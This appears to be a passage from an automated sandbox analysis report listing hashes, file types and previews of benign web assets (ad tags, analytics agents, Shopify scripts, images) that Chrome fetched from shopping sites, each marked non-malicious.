                                                                                                                                                                                    SHA1:EEA047C3C30C3C5AFF350D10B0EBE35802C56528
                                                                                                                                                                                    SHA-256:130B6263E0272B64DB46C42CB3DA57F47CED7317289CE3B0658A5568178CD5EC
                                                                                                                                                                                    SHA-512:A0321512172336B4E759801AFE99AE30BFB278458BBE2E8BD13D8E168962C055FA48E1FA255C7AFD0CC88DD61B564B57B5240F76EF70CE99C22C3B2F2615289F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF87a.............,...........L..;.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (50719)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51045
                                                                                                                                                                                    Entropy (8bit):5.23059825816428
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:3zU/u1oWnkxzKhWdBY2rJxgCrMZ45dJ+KIAlj6cizBzzJpUVstotL:g/+3nsflM6IAV6yRtL
                                                                                                                                                                                    MD5:77777238B92BEBC0A49D5A5675F9955A
                                                                                                                                                                                    SHA1:8EA61CCBBEFF82740B7733822785BA267CF32E8D
                                                                                                                                                                                    SHA-256:C3A391643CEC7104C8B14682C789A614FB8B6F362682878965EE9D5A2D16113E
                                                                                                                                                                                    SHA-512:A66B91BE1BF5A4667C31E0D1BF03ADFB034F08E02DF7A056909E342699E0C04B3925FDA87769341EC0299877EAEF70BDCC4FA2159C3B6704AD3B53B7179C1962
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window.Criteo=window.Criteo||{};window.Criteo.oneTagConfig={partnerId:111036,visitEventEnabled:true,fpIdentifier:"7e6ace58-e4f6-4d35-ad5a-a7fc4b96b996",dynamic:!0,gumDomain:"gum.criteo.com",privateModeDetectionEnabled:true,blockedSteps:[],addClientSideSupportForId5:false,shouldFillPageId:false,enableOffsiteProjection:true};.!function(){"use strict";function v(e,t){var n=null==(n=window.Criteo)?void 0:n.oneTagConfig;return null!=(n=n&&n[e])?n:t}var I,T="5.29.0",u=((P=I=I||{})[P.None=0]="None",P[P.Cookie=1]="Cookie",P[P.LocalStorage=2]="LocalStorage",P[P.Library=3]="Library",o.checkLocalStorageIsWritable=function(){try{var e;return window.localStorage?(e="criteo_localstorage_check",window.localStorage.setItem(e,e),window.localStorage.removeItem(e),!0):!1}catch(e){return!1}},o.checkCookiesAreWritable=function(){var e=new o("criteo_write_test",1e4),t=(e.setValueWithNoDomain("1"),"1"===e.cookieValue);return e.removeWithNoDomain(),t},o.prototype.setCookieRead=function(){this.isCookieRead=!0}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (2801)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2806
                                                                                                                                                                                    Entropy (8bit):5.22581878150763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:t489L/ldfiqm/Ziqmr9iM9n67HLB0t05jzchT88l:t489Ldgir6zLB0t05co8l
                                                                                                                                                                                    MD5:79CEA4402CE1DEFE3D2809F6DED524E9
                                                                                                                                                                                    SHA1:7928A398FCF52AA4773CFF22FD0F68A13C534B39
                                                                                                                                                                                    SHA-256:9E4D5AD21F9C7EC58D10AA03CDCA09068B556CF736F876B443ED2FFEB5C7206C
                                                                                                                                                                                    SHA-512:13C63D7B26460725FCC2B4076342DBB9CC7C1D1B935C348AB4B8B22B5303559240F52505BC0805B34B08326A778299365F4227BCC9B63D6B4C15F000ECE42E19
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useShowShopPayOptin.cjqea2Mu.js
                                                                                                                                                                                    Preview:import{c7 as C,A as m,y as I,a as t,e as _,jp as b,ab as h,bP as d,a9 as f,aa as P,bv as x,fb as E,bf as k,o as R,l as L,eU as O,aj as D,at as M,e5 as T,cq as V,em as A,m as F,pM as z,dE as U,qK as j,bi as q}from"./app.DfgMZONA.js";function Y({impressionType:e,impressionFeatures:s}){const r=C(),n=m(null),i=m({impressionType:e,impressionFeatures:s});return i.current={impressionType:e,impressionFeatures:s},I(()=>{if(!window.IntersectionObserver)return;const o=new IntersectionObserver(p=>{const u=p.some(({isIntersecting:c})=>c);a&&u&&(o.unobserve(a),r("impression",{...i.current,timestamp:new Date}))},{threshold:1}),a=n.current;return a&&o.observe(a),()=>{a&&o.unobserve(a)}},[r]),n}function J({impressionType:e,impressionFeatures:s,children:r}){const n=Y({impressionType:e,impressionFeatures:s});return t("div",{ref:n,children:r})}function K(){const e=_();return t(P,{size:"small",appearance:"subdued",children:t(b,{children:e("shop_pay_remember_me.terms_and_privacy_html",{privacy_href:t(h,{chi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1610x894, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69240
                                                                                                                                                                                    Entropy (8bit):7.953025648853813
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:wadxpruelwpp3at6wqERXBLvXUQIMhFYoJcYKmnaAxoLdDxQb6i:ndxNrt6wqERXBIMxJJKmn3oLddQR
                                                                                                                                                                                    MD5:2BF9DB6E2C58A9A0317F7BE4312D8DF5
                                                                                                                                                                                    SHA1:12725F72B704A5A708FCB7EA2A568A5E48C1CA7A
                                                                                                                                                                                    SHA-256:FB768E4F7AB48B508AFE2E50CE8AB3EBEB6DB6647B696D33706BDB180EC9A93B
                                                                                                                                                                                    SHA-512:76A9658FB792AB516BA71DF4CCFDAF9B77C88CE67824F2CBF0D1C805347220714556F9C6886B763E8354A12BD12F5525D9D671A3D24A41A14EAAB40EC1C3A8C6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................%".."%8(+(+(8U5>55>5UK[JEJ[K.j^^j...|............................%".."%8(+(+(8U5>55>5UK[JEJ[K.j^^j...|..................~.J.."..........2................................................................cL.h.....@..................L.P.........../._=..l.@..0..t.@.....@..;....2R..b..]|.C...a....IA.1..#uv...R......t.............h.....c.V....>..Y....Nz.+'..P.,..'..b.T54..l.u.%....f.yl.]...F.#.|w.7...t..!..p.f......[.1e..[..}:..H..Gds.<'F.0<... b....1"DX.e..$H......HA"!"!!......L.."..H.H.H.I.&@&BC...Z..........U%+.t.........AJ .W.n<./...Wo.+.....#h.ui9.f..zb..M.@.B0- . . .+.........H.H.L.....'\E.9GAwJ.5..i.q..*5.....1.Y.:....j..1.u..M.m+..y..y.ug...w3E.sl..EW.f.W..%m*..O<.X.....[.3y.9:K...1..|..2......`.....h`..........i..%(..(..........=.zY...y.7.0....C.c......2..H.(..9L{1.u.|9v.Nm...L"..\....uYa^.%Z1t.*.y.."....`..b..........U]L...m.p...O....>......6s6....,)..f....Z4Q.+.h'Nya)..\......a....t.p-..NC.m.m.........|....7...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):59337
                                                                                                                                                                                    Entropy (8bit):5.358255541410134
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:gU1UkXFRMDo8L2pbYMN+Yzh6I/dLeSpFgowQNqoKOGUMIYbfrwEAvRhsRYjOT9B2:L8azqjTEwsVUGt0kiwP9Gxsld9
                                                                                                                                                                                    MD5:A6622476D21B1C3EDC8E08BF9F59ACFA
                                                                                                                                                                                    SHA1:29DA3582AEE99E8945E11CA8C703CB73E1189FBE
                                                                                                                                                                                    SHA-256:28EC2EDEF2A5CE0164F7E968E6B580A3797B2DF6CC84AC3DC7C8697610EE5E19
                                                                                                                                                                                    SHA-512:66A6515A462A8C53CCE9AFAAD231D0495C0CDE9E51393EBC8CECFE56FE55969775196826EA362B3AB0A3553364615CCB280940D6814ED54F534E2FD4346AA357
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/js/zulily-nr-agent.js
                                                                                                                                                                                    Preview:;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]}};..;NREUM.loader_config={accountID:"4571703",trustKey:"2725444",agentID:"1386192029",licenseKey:"NRJS-6aaad96844ded12b7e9",applicationID:"1386192029"};.;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"NRJS-6aaad96844ded12b7e9",applicationID:"1386192029",sa:1};.;/*! For license information please see nr-loader-spa-1.265.1.min.js.LICENSE.txt */.(()=>{var e,t,r={8122:(e,t,r)=>{"use strict";r.d(t,{a:()=>i});var n=r(944);function i(e,t){try{if(!e||"object"!=typeof e)return(0,n.R)(3);if(!t||"object"!=typeof t)return(0,n.R)(4);const r=Object.create(Object.getPrototypeOf(t),Object.getOwnPropertyDescriptors(t)),o=0===Object.keys(r).length?e:r;for(let a in o)if(void 0!==e[a])try{if(null===e[a]){r[a]=null;continue}Array.isArray(e[a])&&Array.isArray(t[a])?r[a]=Array.from(new Set([...e[a],...t[a]])):"object"==typeof e[a]&&"object
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (39697)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):136265
                                                                                                                                                                                    Entropy (8bit):5.4579040090972
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q5/+JU5hLofQru1CKsJ9nJbjMJZyDv4OvVX47USYsk49HQse00:Q5/+JUPLDoIDvUHQsn0
                                                                                                                                                                                    MD5:F9A7ED66DD7A1D0D455909151E237716
                                                                                                                                                                                    SHA1:E416BFBC43087EC32183621A3DFD080C14D2155D
                                                                                                                                                                                    SHA-256:712F2DF6C9B6EBCB88B1C6173328752C352C2EC22E3C50CB5AFC934DD056F684
                                                                                                                                                                                    SHA-512:92A427AF8B0945D0CE385573603597E118D373AE163B282D66530600F88B01673CD243930C6BCF2F8367A05DAC4647FEE346681BB481BAC2E3681BDD46470710
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[976],{71387:e=>{e.exports={cloudinaryUploadBase:"https://api.cloudinary.com/v1_1/powerreviews/auto/upload",cloudinaryDownloadBase:"https://media.powerreviews.com",local:{name:"local",entryPath:"https://localhost:3001/",assetPath:function(){return"https://localhost:3001/"},akamaiUIBase:"https://localhost:3001",awsUIBase:"https://localhost:3001",writeBase:"https://devwriteservices.powerreviews.com",b2cReadBase:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOrigin:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOS:"https://dev-display-api.powerreviews.io",b2cReadProxy:"https://devui.powerreviews.com/api/",cloudinaryImagePreset:"dev_preset",cloudinaryVideoPreset:"dev_video_preset",trackingBase:"https://t-dev.powerreviews.com",servicesBase:"https://qaservices.powerreviews.com/JSController.do",uiPRBase:"https://localhost:3001",versionFullJS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (6117)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):179230
                                                                                                                                                                                    Entropy (8bit):4.952644579824421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:2BUJrGkdKQ2h9EJLvbJw8dcXw7XnJ7MOHVOBh9GR9:6yUw7XnJ7MOHVOBL0
                                                                                                                                                                                    MD5:B0247D99581F6488E8CD9EB7B3F584C8
                                                                                                                                                                                    SHA1:F1E7CC622A623FBD78B383C01C6777D77615C011
                                                                                                                                                                                    SHA-256:F0B013344776069C1417A871CD2A70A479F5D552EDE19239FB2C7EDE2D5FB9EA
                                                                                                                                                                                    SHA-512:A82F4142AE9CD0585EB35F4FBF58FB2AAA8575E552FD27AEAD5DCD5356AB6AA2CD4B17EE5074552A5FB43F00B441769A0873DF8A7F573F73AA78D20719C6BB78
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/
                                                                                                                                                                                    Preview:<!doctype html>.<html. class='no-js scroll-auto'. lang='en'.>. <head>. <meta charset='utf-8'>. <meta. http-equiv='X-UA-Compatible'. content='IE=edge'. >. <meta. name='viewport'. content='width=device-width, initial-scale=1, maximum-scale=1'. >. . .. <link. rel='canonical'. href='https://www.zulily.com/'. >. <link. rel='preconnect'. href='https://cdn.shopify.com'. crossorigin. ><link. rel='icon'. type='image/png'. href='//www.zulily.com/cdn/shop/files/floral_2x_6db7a3cd-9a85-43a1-904d-f99d4afe9857.png?crop=center&height=32&v=1720715379&width=32'. ><title>Zulily</title>.. .. .. .. . <script. type='text/javascript'. src='https://ak1.ostkcdn.com/js/zulily-nr-agent.js'. defer. ></script>. .. . <script. type='text/javascript'. src='https://cdn.evgnet.com/beacon/c556855555573h9jz3n3n3p091552376/zulily/scripts/evergage.mi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 516x516, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5342
                                                                                                                                                                                    Entropy (8bit):7.934808575067854
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:gfTlx1WzHbWLKF6GOoiNNtGPeBjryRds+nx7x1zpoSbD9TAyJ2tvBpw:MTlx19xGOoiN3BjryR6Gn4mJTAhtvL
                                                                                                                                                                                    MD5:13EFFA13DFF521BAADF3AE96A4F27EBF
                                                                                                                                                                                    SHA1:94FD366BE815DE6E5BE3BC62AFFFC29699E46EAB
                                                                                                                                                                                    SHA-256:23D7FB12A15D4CC57D3AD93D3713EE7BE3CAC957F528F4372C33EE709632F246
                                                                                                                                                                                    SHA-512:8291703A3903E5DCDEAB789214C7F8D3144FC64172313CA51B7E716DBDDC5FE565D77296BBB612136BADCA0BD2671B58E5E9ECC5D45A259673FFBDC8F65651CB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/02132023-MOPS-HP-Redesign-Frame3.jpg?imwidth=1920?imwidth=1920
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>.R.L.(.".r.....ins..E...!G.......?..7.q.a...?...<.~B.w.&.)....k......0.9.b/.s-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.-.....L.Ct......<g}..B4.......r.......!._w...g....C..7..Yv..,n..7kE."l.6Nf.W..?.J......'68S.n.q..8.T,..]..P/V0`s...v3y-~z:&..dr....7..r...B..d...Zq......Mo$.p/.1%'xM.b.}.T..Y...|g1.e....~..q.8j{..w..%...cz.,E..d....(Pp..ZL.-...;%r...(....G.........O....W.b...79E.CM.a...~...>..2...c.....z.^.....FI.e..z...."....w".........\.B.&...'.....7......L..o..9c.6.1.C0m.=.m(......1.R.!@.g,-.VX.......ps-.-=.....I.i.I.,...XY)~.Y.~........WuG9._...r4]2.<...Z.29U......lm.*.5T......d;.A..~R..^&.i.......U...e0..p.....0P.....9L...S8?....g..A.6.......dMo.a....\...... 5O..n. ..Z.=\.......b.;...^>.$PR....{.....>..F.9n.....=}!#.C..;..mK...u..i........L.D..8I.-._.Q.UE..R.......I...U..%.;....w..%6l!(lgB.("d........j9.r...;.1m....J.u_......Rw....l..l.RT..h..a..L.).....<IZ}).}oLE
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12303)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                    Entropy (8bit):5.287643627842759
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rek+w1w+FCH501fo7R1qpu5TMSU9i/VY8cJw3:reLOjFSGxuSKJ3
                                                                                                                                                                                    MD5:70073EF6766D4163337BE9784525AE8A
                                                                                                                                                                                    SHA1:5C3957E4CD6476F69CF5557353B97FDE3D672776
                                                                                                                                                                                    SHA-256:20935C4A7536149778BA3CCF537AAA9DBC520DA74BF74A1736488A8E6BDF9E28
                                                                                                                                                                                    SHA-512:177BCC2A278AD5CAE1207AFF43FB6CAC7E686D00E0110B57DD0DCEDDBB6D084943567B56C88412B6CAB9680687A528C8E73219DFACBB6959A3935B51C7965025
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/app/web-pixel-553255071@a46b87f88a4ff97a9490f9aa4799ba7b/pixel.modern.js
                                                                                                                                                                                    Preview:(function(shopify) {.(()=>{var se="WebPixel::Render";var Y=e=>shopify.extend(se,e);var K={config:0,set:1,page_view:2,view_item:3,add_to_cart:4,purchase:5,begin_checkout:6,search:7,add_payment_info:8,update:9,default:10},ce={send_to:0,page_path:1,page_title:2,page_location:3,ignore_referrer:4,ecomm_prodid:5,ecomm_totalvalue:6,ecomm_pagetype:7,items:8,id:9,name:10,brand:11,category:12,coupon:13,price:14,quantity:15,variant:16,value:17,currency:18,tax:19,shipping:20,search_term:21,total:22,transaction_id:23,ad_storage:24,ad_user_data:25,ad_personalization:26,analytics_storage:27},le={config:[],set:[],page_view:["send_to"],view_item:["send_to","ecomm_prodid"],add_to_cart:["send_to","ecomm_prodid"],purchase:["send_to","transaction_id"],begin_checkout:["send_to"],search:["send_to"],add_payment_info:["send_to"]};var fe="",ge=function(e){fe=e},Pe=Math.floor(Math.random()*2147483648),pe=function(){if(arguments[0]==="js")return;let r=window.dataLayer.filter(o=>Object.prototype.toString.call(o)==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2276
                                                                                                                                                                                    Entropy (8bit):6.997340380387832
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxfHoAEGz/mRqfIJE4RFUNKQIh46H9xxow2n:NBIl/XrxfHoAJ2JE4HpH9zow2n
                                                                                                                                                                                    MD5:74FAA103012E2B159F764147752A12F4
                                                                                                                                                                                    SHA1:B03B6DACA083E0641086D695785F9386BCE8F210
                                                                                                                                                                                    SHA-256:39BACB11534BE0F96DE92ECB3CDAB5F702A91342C6FA031E2D871E5DD3248E93
                                                                                                                                                                                    SHA-512:26B15C3A5044B31565B74F944CF977A32B7E372C6B4B06B0A583214B5464A49008E5D7FCB371CC513DB2EAEB366A4D3E3D416265A3D56B4509C50F4334F8164F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................zS.CA..-I.8....o~.....<.U+...%5e......O.....A...x%..CV;$)."$.Q...7.cS.[3.yGJ..I'Yz.gR...P.)\a....Q|.._T.yV.........M.h.kYhY..;fIj
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1841
                                                                                                                                                                                    Entropy (8bit):6.6083820629209145
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxo/6Nn8Ucty6GyciXiS6Gb05:NBIl/XrxlGty6VXiS6t5
                                                                                                                                                                                    MD5:C3196C7B157BDB790E037C79D52FC71C
                                                                                                                                                                                    SHA1:5A7A98B5D30F4874F0E71F5A63DD762B1174ED46
                                                                                                                                                                                    SHA-256:8BE53F912B05483A72EDD65712170A6A3963146386EC11341C3B6B5BFA7503AC
                                                                                                                                                                                    SHA-512:24632DC25BE4B1575D472522BAD9AF890233E664369F7DAC5077C44BA91332EE80BD0B6251AC76225EFD1CACBF6B4E0CCBF65E59D242F99E5C2A2167E8A742F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`......36..Y.o9_l.!.G.........."m[*..B7..4.@...}...@...V....'7xj."4E...Is.-5......:7..|.5.G6....u3.O0.......=....................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (19350), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19350
                                                                                                                                                                                    Entropy (8bit):5.19688399030424
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:WzvtO/t2njZDw1QqyytHPjgdudPZVuQvhyx469dZm7gqCHfV+lS:EOl2njdw1QqyytHPjgdudPZVuIK4YZmu
                                                                                                                                                                                    MD5:EBA56CA07CC34448E0BD43C9D4157C8B
                                                                                                                                                                                    SHA1:84E6FEC79CA04C3A812EBB98106C0DB7B6F4E108
                                                                                                                                                                                    SHA-256:4FFB65B11C10E1E9A868C23BC1E39B4B091B6864387CD55278A10EC4BD663288
                                                                                                                                                                                    SHA-512:09FCA43B1D56D2307459CA27C379F3D4779C6AA9BADCA8FEE1BA36D7CD56C97F40CDA1AB14EC654E398DFFF15E562608FC2FF6EFEF396ADD47E9B7DEDC9AD319
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/s/assets/external/app.js
                                                                                                                                                                                    Preview:(function(){var r,t,a,s;window._Shopify=window._Shopify||{},r=["Shopify.API.reportScroll"],a=function(e,t){var n,i,o;if(("undefined"!=typeof console&&null!==console?console.log:void 0)&&(("undefined"!=typeof ShopifyApp&&null!==ShopifyApp?ShopifyApp.debug:void 0)||("undefined"!=typeof ShopifyPOS&&null!==ShopifyPOS?ShopifyPOS.debug:void 0)||t)&&!window.Teaspoon){for(i=0,o=r.length;i<o;i++)if(n=r[i],0<e.indexOf(n))return;return console.log("ShopifyApp "+e)}},s=function(e){return("undefined"!=typeof console&&null!==console?console.warn:void 0)&&!window.Teaspoon?console.warn("ShopifyApp "+e):a(e,!0)},t=function(e){var t,n,i,o,r,a,s,l;if(!(e.document&&e.document.body&&e.navigator&&e.navigator.userAgent))return!1;if(!(-1!==(l=e.navigator.userAgent).search(/Shopify Mobile|Shopify POS|Shopify Ping/g)&&-1!==l.search("iOS")))return!1;for(o=e.document.createElement("style"),a="",r=/(\@media[^\{]*)print([^\{]*\{)/g,n=0;n<e.document.styleSheets.length;){for(s=e.document.styleSheets[n],i=0;i<s.cssRul
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.746633951963653
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIflqyLHwrhHALiRoLhGqjtALQiILBEAL7qsLC0LUqVLKAVLV:YB3LUHALNLXtALILBtLjLHLJLFLV
                                                                                                                                                                                    MD5:E8F3E5C461CECE9E5FB19724CC2BA57C
                                                                                                                                                                                    SHA1:FB28C6B5C7A1AD7054B641441C9BA09F5532D804
                                                                                                                                                                                    SHA-256:5FFE20CD92F72E27B6D74FA4502875EEE51AF05809131E9DFDC6171F0DABCB71
                                                                                                                                                                                    SHA-512:82A23340F97A4F7950ED682AB2637857293CDE2DE82E56D0B3223AC6A507F930DA7656FB54DC1530E44E24A106B5A7A467BF8C9955660C702F286F7446CE7988
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33240501","rollup":{"average_rating":4.47,"rating_count":32,"review_count":32,"answered_questions":0}},{"page_id":"34669053","rollup":{"average_rating":4.66,"rating_count":99,"review_count":99,"answered_questions":0}},{"page_id":"34061828","rollup":{"average_rating":4.84,"rating_count":214,"review_count":214,"answered_questions":0}},{"page_id":"36369010","rollup":{"average_rating":4.07,"rating_count":57,"review_count":57,"answered_questions":0}},{"page_id":"37353141","rollup":{"average_rating":4.86,"rating_count":7,"review_count":7,"answered_questions":0}},{"page_id":"38408327","rollup":{"average_rating":5.0,"rating_count":3,"review_count":3,"answered_questions":0}},{"page_id":"20000656","rollup":{"average_rating":4.72,"rating_count":166,"review_count":166,"answered_questions":0}},{"page_id":"24331708","rollup":{"average_rating":4.79,"rating_count":191,"review_count":191,"answered_questions":0}},{"page_id":"30886521","rollup":{"average_rating":4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):34670
                                                                                                                                                                                    Entropy (8bit):7.984183596515911
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:7M1x9LB4XLyY4RzPX0lPHCv0CuLedGVX14ulpfV8A48:gvILyJRzPOPHkuLeyGepE8
                                                                                                                                                                                    MD5:A15BA6D8677FC92C14DD868FA6C0E6C0
                                                                                                                                                                                    SHA1:07B8D1FD8A441090BFBA85CA7A4C68AA501334E5
                                                                                                                                                                                    SHA-256:CC40CB2350AE00F993631CFF1DAC73D89DD3D29ABA1EF6E16A1E7E31EF03E0C0
                                                                                                                                                                                    SHA-512:A62C806CB0F46F03A880A1FD39D6E615F1EF4E575728F51AB4AFF36437C0FC76402AD530C2EB155FB309057A177F98EEE372000198C8CB9974641DBE496AFCF4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Hanlee-Outdoor-Rustic-Acacia-Wood-Folding-Adirondack-Chair-_28Set-of-2_29-by-Christopher-Knight-Home.jpg?v=1710950811&width=320
                                                                                                                                                                                    Preview:RIFFf...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....W...*@.@.>9..C"!!.... .....w.../...WH.K....y...W...]..'..+............?.=...yf.........K...../._t..=A?.......{........................../....`......=@<...._..>.....?....K.O..m?....`.....C.Y.........?.w...~)...3..#..._...~..{...>.....|...._.?...{O.O...?....G.s.....z........../...............^.....Y...........r...........w........i.{.....?..............o.........=.g?..D.@5...L....S.^G|..t....gxE..u2.........T.{B...x.u...r.T......r@)d4$.....vd.._.....)...{D......>%..N.....k..]..@..9...n/f0.....S....]M.!..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):89476
                                                                                                                                                                                    Entropy (8bit):5.2896589255084425
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                    MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
